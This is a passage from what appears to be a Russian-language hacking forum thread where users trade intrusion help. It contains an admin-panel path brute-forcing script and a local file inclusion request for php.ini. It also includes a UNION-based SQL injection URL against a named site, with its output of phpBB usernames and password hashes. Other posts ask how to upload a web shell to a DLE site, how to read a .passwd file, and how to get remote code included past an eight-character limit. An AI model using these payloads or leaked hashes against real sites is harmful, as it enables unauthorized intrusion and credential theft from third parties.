Code: #/usr/bin/python import sys, os, time, httplib if sys.platform == 'linux' or sys.platform == 'linux2': clearing = 'clear' else: clearing = 'cls' os.system(clearing) if len(sys.argv) != 2: print "\n|-------------------------------------------------------------|" print "| Admin login finder v2.0 |" print "| Help: admin-find.py -h |" print "|---------------------------------------------------------------|\n" sys.exit(1) for arg in sys.argv: if arg == '-h': print "\n|-----------------------------------------------------------------------------|" print "| Admin login finder v2.0 |" print "| Usage: admin-find.py www.site.com |" print "| Example: admin-find.py site.com |" print "|-------------------------------------------------------------------------------|\n" sys.exit(1) site = sys.argv[1].replace("http://","").rsplit("/",1)[0] site = site.lower() admin_path = ['admin.php','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/','memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php','joomla/administrator','login.php', 'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html','admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html','admin/controlpanel.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html','w ebadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html','admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php','administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php','bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','modelsearch/login.php','moderator.php','moderator/login.php','moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php', 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html','webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.htm l','administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','m odelsearch/login.html','moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpane l.html','admincontrol.html','panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','adminarea/index.php','adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php','modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php', 'admin2/login.php','admin2/index.php','adm/index.php','adm.php','affiliate.php','adm_auth.php ','memberadmin.php','administratorlogin.php'] print "\n|-------------------------------------------------------------|" print "| Admin login finder v2.0 |" print "|---------------------------------------------------------------|\n" print "\n[-] %s" % time.strftime("%X") print "[+] Target:",site print "[+] Checking paths..." print try: for admin in admin_path: admin = admin.replace("\n","") admin = "/" + admin connection = httplib.HTTPConnection(site) connection.request("GET",admin) response = connection.getresponse() print "%s %s %s" % (admin, response.status, response.reason) except(KeyboardInterrupt,SystemExit): raise except: pass
в принципе я делаю только вот такой запрос http://www.sitename.com/scriptname.php?param=../../../../../../../../../../../usr/local/lib/php.ini%00
2 Saiga Можно воспользуватся функцией group_concat() Code: http://www.so-znanie.com/index.php?id=-8+union+all+select+1,2,group_concat(concat_ws(0x3a3a,username,user_password))+from+phpbb_users-- Code: Anonymous::,admin::$H$9E9TzrtDlqUnPvFMYhqJaISbU/UKV21,AdsBot [Google]::,Alexa [Bot]::,Alta Vista [Bot]::,Ask Jeeves [Bot]::,Baidu [Spider]::,Exabot [Bot]::,FAST Enterprise [Crawler]::,FAST WebCrawler [Crawler]::,Francis [Bot]::,Gigabot [Bot]::,Google Adsense [Bot]::,Google Desktop::,Google Feedfetcher::,Google [Bot]::,Heise IT-Markt [Crawler]::,Heritrix [Crawler]::,IBM Research [Bot]::,ICCrawler - ICjobs::,ichiro [Crawler]::,Majestic-12 [Bot]::,Metager [Bot]::,MSN NewsBlogs::,MSN [Bot]::,MSNbot Media::,NG-Search [Bot]::,Nutch [Bot]::,Nutch/CVS [Bot]::,OmniExplorer [Bot]::,Online link [Validator]::,psbot [Picsearch]::,Seekport [Bot]::,Sensis [Crawler]::,SEO Crawler::,Seoma [Crawler]::,SEOSearch [Crawler]::,Snappy [Bot]::,Steeler [Crawler]::,Synoo [Bot]::,Telekom [Bot]::,TurnitinBot [Bot]::,Voyager [Bot]::,W3 [Sitesearch]::,W3C [Linkcheck]::,W3C [Validator]::,WiseNut [Bot]::,YaCy [Bot]::,Yahoo MMCrawler [Bot]::,Yahoo Slurp [Bot]::,Yahoo [Bot]::,YahooSeeker [Bot]::,Виталий::$H$9hSsjxJ2UF5iUD8kzntbWpyPoXfE Там ботов больше чем людей =))
Дорогие отвечающие на вопросы!!! Я уже несколько раз говорил, что если уж вы отвечаете на вопросы не надо писать ОХИНЕЮ и разводить флуд и оффтоп на 15 страниц. Человек искал админку ат сайта, имея пасс от него. Вот пост НОРМАЛЬНОГО ответа по теме: ВСЁ !!!! Нахрена ему говорить, что пароль не правильный, когда админка даже не найдена? Нахрена ему ваша скуль? У него есть аккаунт, может он его и достал через скуль, он НЕ ПРОСИЛ искать баги, он просил админку. Нахрена ему форум, нахрена ему расшифровывать хеши от него? И весь этот ОФФТОП на несколько страниц, а результата нет и не предвидится. И так по каждому вопросу. На будующее, такую бессмысленную активность буду расценивать как флуд и набивание постов и реагировать на неё согласно правилам форума. Сюда-же попадает ОХИНЕЯ, которую некоторые несут с завидной регулярностью. Если вы не уверены в ответе, отвечать НЕ НУЖНО. Если человек просит подсказать есть ли скуль, НЕ НАДО писать, что там расскрытие пути, сдесь нет слепых юзеров. Не надо сюда копипастить милворм, в лучшем случае ссылку на сплоит. Не надо показавать свою некомпетентность, я вам со всей ответственностью могу заявить, что такого рода активность не пойдёт вам в зачёт, она напротив только показывает отсутствие знаний. Надеюсь , что все меня поняли правильно, утопить топик во флуде я не дам, весь оффтоп буду жестко пресекать Спасибо за внимание
челы резко встал вопрос залития шелла в dle 1. изменил тип файлов, залил через новость.. но я незнаю названия файла.. 2. через шаблон пхп не исполняется.. подскажи еще способы.. очень прошу - нужно!
народ, помогите. есть сайт www.sait.ru скрипт www.sait.ru/text.php имхо бажный. методом GET передаются два параметра p & n генерация страницы просиходит примерно следующим образом $path = substr($_GET['p'],0,8)."/".substr($_GET['n'],0,8).'.htm'; /// $x = fopen($path, 'w'); /// require($path); если в корне лежит title.htm, то при www.sait.ru/text.php?p=news&n=../title выведет ее. одна проблема: оба параметра обрезаются до 8 символов... Как это можно обойти?? в корне также лежит .passwd Никак не могу его вывести, т.к. он считает и %00, и название файла получается больше 8 символов, это бесит.. я не знаю как убрать слеш, чтоб ввести название двумя параметрами... Также не могу исполнить там свой скрипт с другого хоста.. пробовал www.sait.ru/text.php?p=http:/&n=moysait.ru/code.php%00 но никак не укладываюсь в 8 символов. заранее спасибо
joks, у тебя ведь 2 параметра? если так, то пусть p = http:/ n = abc.ru/a тогда path = http://abc.ru/a.htm осталось найти трехбуквенник ру
Можно ли как-то вывести все таблицы из БД (sql inj) не лимитом?? Т.е не менять limit+1,1, limit+2,1 и т.д, а одним запросом вывести всю БД!!!
.:[melkiy]:. нет, либо утилитами,очень редко на сайте где уязвимость выводятся вся инфа без использования лимита
group_concat() НЕ вывод всё....он огранич значением в group_concat_max_len.Так же он вроде бы не поддерживает лимит.
Если после ввода такой конструкции site.ru/index.asp?id=2' Вылезла ошибка : PHP: Microsoft OLE DB Provider for SQL Server ошибка '80040e14' Unclosed quotation mark before the character string ''. Возможно ли сдесь провести SQL-inj, просто я в MS SQL не как вообще...